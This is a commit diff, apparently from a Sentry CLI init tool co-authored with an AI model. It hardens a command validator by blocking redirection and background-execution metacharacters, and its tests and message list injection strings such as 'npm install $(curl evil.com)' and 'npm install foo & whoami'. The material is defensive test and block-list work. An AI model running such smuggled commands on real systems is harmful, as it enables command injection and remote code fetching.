fix: block redirection/background metacharacters and use cross-platform shell

Add >, <, and & to SHELL_METACHARACTER_PATTERNS to prevent redirection
(e.g. `npm install foo > /arbitrary/path`) and background execution
(e.g. `npm install foo & curl evil.com`) in validated commands.

Replace hardcoded `spawn("sh", ...)` with `spawn(command, [], { shell: true })`
so Node selects the platform-appropriate shell (cmd.exe on Windows).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

Author: betegon

src/lib/init/local-ops.ts

@@ -39,6 +39,9 @@ const SHELL_METACHARACTER_PATTERNS: Array<{ pattern: string; label: string }> =
     { pattern: "$(", label: "command substitution ($()" },
     { pattern: "\n", label: "newline" },
     { pattern: "\r", label: "carriage return" },
+    { pattern: ">", label: "redirection (>)" },
+    { pattern: "<", label: "redirection (<)" },
+    { pattern: "&", label: "background execution (&)" },
   ];
 
 const WHITESPACE_RE = /\s+/;
@@ -325,7 +328,8 @@ function runSingleCommand(
   stderr: string;
 }> {
   return new Promise((resolve) => {
-    const child = spawn("sh", ["-c", command], {
+    const child = spawn(command, [], {
+      shell: true,
       cwd,
       stdio: ["ignore", "pipe", "pipe"],
       timeout: timeoutMs,

test/lib/init/local-ops.test.ts

@@ -37,8 +37,6 @@ describe("validateCommand", () => {
       "pnpm add @sentry/node",
       "pip install sentry-sdk",
       "pip install sentry-sdk[flask]",
-      'pip install "sentry-sdk>=1.0"',
-      'pip install "sentry-sdk<2.0,>=1.0"',
       "pip install -r requirements.txt",
       "cargo add sentry",
       "bundle add sentry-ruby",
@@ -49,7 +47,6 @@ describe("validateCommand", () => {
       "flutter pub add sentry_flutter",
       "npx @sentry/wizard@latest -i nextjs",
       "poetry add sentry-sdk",
-      "npm install foo@>=1.0.0",
     ];
     for (const cmd of commands) {
       expect(validateCommand(cmd)).toBeUndefined();
@@ -66,6 +63,9 @@ describe("validateCommand", () => {
       "npm install $(curl evil.com)",
       "npm install foo\ncurl evil.com",
       "npm install foo\rcurl evil.com",
+      "npm install foo > /tmp/out",
+      "npm install foo < /tmp/in",
+      "npm install foo & whoami",
     ]) {
       expect(validateCommand(cmd)).toContain("Blocked command");
     }